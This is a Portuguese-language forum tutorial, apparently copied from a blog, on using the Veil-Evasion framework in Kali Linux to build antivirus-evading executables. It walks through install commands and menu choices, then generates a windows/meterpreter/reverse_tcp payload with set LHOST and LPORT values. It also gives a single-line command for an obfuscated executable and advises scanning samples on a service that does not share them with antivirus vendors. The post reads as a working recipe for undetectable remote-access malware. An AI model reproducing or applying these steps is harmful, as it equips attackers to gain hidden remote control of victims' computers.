Olá, Visitante!     Entrar     Registrar




Plugin HIDE desativado, baixem tudo a vontade


Avaliação do Tópico:
  • 0 votos - 0 Média
  • 1
  • 2
  • 3
  • 4
  • 5
[TUTORIAL] Burlando o antivírus usando o Veil-Framework no Kali Linux
blackunix  



Owner

Mensagens: 54
Tópicos: 34
Registrado: Setembro 2017
Curtidas 8
Nível de Aviso:
Creditos: 42
Reputação: 659

                

3 anos de Serviço




#1
Burlando o antivírus usando o Veil-Framework no Kali Linux


O Veil é uma aplicação em Python que tenta automatizar a criação de payloads que evitam AV em um novo framework.

O Veil-Evasion é uma ferramenta para gerar payloads executáveis que ignoram soluções antivírus comuns, criando cada payload randomizado. O código do Veil-Evasion está localizado em https://www.github.com/Veil-Framework/Veil-Evasion/ e é uma parte do super projeto Veil em https://github.com/Veil-Framework/Veil que nós recomendamos a maioria dos usuários clonar e instalar.


Também podemos usar os payloads do framework Metasploit e seus compatíveis para as arquiteturas x86 e x64 e atualizar o Veil na command line ou via menu.



Se você quiser instalar o Veil em seu próprio ambiente, você pode usar os comandos abaixo:


#wget -c https://codeload.github.com/Veil-Framewo...zip/master

#unzip -q master.zip

#cd Veil-Evasion-master / setup

#. / setup.sh











Depois que o Veil estiver instalado, basta executá-lo com o comando abaixo:

 

#. / Veil-Evasion.py



Em seguida, mude para o diretório “Veil-Master” e inicie o script python ./Veil-Evasion.py. A janela do Veil aparecerá. Você poderá ver que temos hoje 31 payloads:


Você pode obter uma lista de todos os payloads com o comando “list”:




 
[>] Please enter a command: list

 
[>] Please enter a command: use 27




 

[>] Por favor, digite um comando: set use_pyherion Y



Os payloads incluem payload injection no estilo PyInjector com ou sem criptografia e payload injection do PowerShell.PyInjector cria um executável Python com uma carga ASCII incorporada, mas usa API calls do Windows para colocar o payload na memória e executá-lo.


Ambos os métodos são muito eficazes para a evasão AV. Eu vou usar o payload python / b64_substitution. Esse método usará o estilo de injeção PyInjector com substituição do payload útil. Eu digito "use 27" e pressiono Enter. Ele carrega esse componente, conforme mostrado abaixo:


[>] Please enter a command: generate


Depois de entrar com o comando generate, é necessário aguardar enquanto o shellcode é gerado.


Agora vamos selecionar msfvenom digitando “1”

[>] Please enter the number of your choice :  1


 

Depois disso, precisamos digitar alguns detalhes:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

 

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

 

Enter value for ‘LPORT’: “443”





 

Você precisa pressionar enter e então Veil nos solicita o nome do nosso payload. Neste caso, "indetectável"

Nós vamos usar o Pyinstaller. Ele irá criar um .exe instalável. Para isso, vamos digitar "1"


[>] Please enter the number of your choice :  1



Em seguida, digito o comando “generate” e pressiono enter para criar o executável.

Os programadores de Python que lerem isso certamente apreciarão o código-fonte produzido. Olhe para esta bela bagunça quente de um programa! Todos os nomes de variáveis são randomizados. As cargas são criptografadas e codificadas.

No entanto, fica ainda melhor acessá-lo diretamente a partir da linha de comando, para que você não precise usar o console para gerar essas cargas.

Eu posso gerar a mesma carga, executando apenas um único comando:

#./Veil-Evasion.py  -l  python -p python/b64_substitution  -o trytofindthis –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.31.20 LPORT=443

Com essa interface command-line-style, você pode dar um bypass no sistema de menus do Veil e dos scripts.

No final, podemos obter nosso executável em “root/Veil-master/output/compiled/”






Os desenvolvedores do Veil não querem enviar nenhuma carga para http://www.virustotal.com para evitar a distribuição para os fornecedores de antivírus. Há um alternative use  vscan.novirusthanks.org. Esse site verifica os arquivos suspeitos para detecção de malware e nos oferece a opção abaixo: “Do not distribute the sample”.

Fonte: sathisharthars blog
  

12-01-2019 06:52
 Procurar Responder


Saltar Fórum:


usuários a ver este tópico: 1 Visitante(s)